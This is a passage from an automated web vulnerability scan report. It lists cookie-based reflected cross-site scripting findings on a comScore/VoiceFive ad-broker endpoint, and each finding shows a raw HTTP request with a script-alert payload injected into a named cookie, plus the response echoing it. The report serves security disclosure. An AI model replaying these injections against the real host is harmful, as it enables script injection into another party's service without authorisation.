Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&317ae<script>alert(1)</script>84d04f88d13; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:36 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&317ae<script>alert(1)</script>84d04f88d13' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.430. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 61901<script>alert(1)</script>e9f9e71368c was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&61901<script>alert(1)</script>e9f9e71368c; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:38 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
u Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&', "ar_p82806590": 'exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&61901<script>alert(1)</script>e9f9e71368c', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc
...[SNIP]...

1.431. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload fd1ee<script>alert(1)</script>13fe5eda3a4 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&fd1ee<script>alert(1)</script>13fe5eda3a4; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=3&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:38 2011&fd1ee<script>alert(1)</script>13fe5eda3a4=&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31522

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
23 22:13:14 2011&prad=62872914&arc=42476438&', "BMX_G": 'method->-1,ts->1309224197', "ar_p84552060": 'exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&fd1ee<script>alert(1)</script>13fe5eda3a4', "ar_p90452457": 'exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11
...[SNIP]...

1.432. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 47387<script>alert(1)</script>6d3deb7d4c was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&47387<script>alert(1)</script>6d3deb7d4c; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:37 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31552

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&', "ar_p85001580": 'exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&47387<script>alert(1)</script>6d3deb7d4c', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p84552060&prad=%5B_topp_placementid%25%5D&arc
...[SNIP]...

1.433. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p87077372 cookie is copied into the HTML document as plain text between tags. The payload c27e4<script>alert(1)</script>0d1479946ad was submitted in the ar_p87077372 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&c27e4<script>alert(1)</script>0d1479946ad; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p84552060=exp=2&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:28:46 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; BMX_G=method->-1,ts->1309224495; BMX_3PC=1; UID=33da324b-72.246.30.136-1309224496; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224526

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:51:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=4&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:51:55 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:51:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31911

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
13:14 2011&prad=62872914&arc=42476438&', "BMX_G": 'method->-1,ts->1309224495', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&c27e4<script>alert(1)</script>0d1479946ad', "ar_p90452457": 'exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&', "ar_p84552060": 'exp=3&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01
...[SNIP]...

1.434. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload 15cd0<script>alert(1)</script>44f362fccf1 was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&15cd0<script>alert(1)</script>44f362fccf1; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:38 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
ue Jun 28 01:23:31 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&', "ar_p90452457": 'exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&15cd0<script>alert(1)</script>44f362fccf1', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

1.435. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 78cd8<script>alert(1)</script>b32677a42c3 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

